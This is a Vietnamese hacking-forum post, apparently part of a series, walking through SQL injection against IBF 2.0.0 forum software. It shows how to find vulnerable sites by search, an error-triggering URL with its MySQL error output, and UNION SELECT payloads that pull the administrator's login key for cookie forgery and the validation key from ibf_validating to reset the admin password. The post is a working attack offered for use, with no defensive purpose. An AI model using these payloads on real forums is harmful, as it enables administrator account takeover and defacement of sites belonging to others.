Tổng Hợp hack IBF (bài 2)
Chài típ tục với IBF 2.0.0 nào
Lỗi SQL INJECTION
Search trên google giống trên nha
hxxp://www.nhocikaka.com/forums/index.php?act=Post&CODE=02&f=1&t=1&qpid=1'Mấy cái màu đỏ là forum nào topic nào id nào ( tìm cái id Admin đó )
Run cái link trên ta thu đc cái này
Code:
mySQL query error: select p.*,t.forum_id FROM
ilu_posts p LEFT JOIN ilu_topics t ON
(t.tid=p.topic_id)
WHERE pid IN (1')
mySQL error: You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 2
mySQL error code:
Hí dính lỗi rùi ta nghich típ chứ anh em
hxxp://www.nhocikaka.com/forums/index.php?act=Post&CODE=02&f=1&t=1&qpid=1) union select 1,1,1,1,1,1,1,1,1,1,member_login_key,1,1,1,1,1,1,1 ,1,1 from ibf_members where id=1 /*
Hè run xong ta đc cái passhash Fake cookies rùi vào forum với quyền Admin <<== Nói thế chứ em chăng hỉu cái cóc khô ji` cả
Nếu như vậy thì ta chỉ có thể vào Forum vời quyền admin thui chứ sao vào Acp Admin mà phá đc cơ chứ
Ok típ tục nào
ForGot Pass Admin nào
index.php?act=Reg&CODE=10
Xong rùi ta sử dụng Code này để lấy Vkey
Code:
http://www.nhocikaka.com/forums/index.php?act=Post&CODE=02&f=1&t=1&qpid=1) union select 1,1,1,1,1,1,1,1,1,1,vid,1,1,1,1,1,1,1,1,1 from ibf_validating where member_id=1 /*
Lấy đc Vkey rùi Đổi pass ở đâu các bạn bít rùi chứ giống trên đó
Nhocikaka(HCE)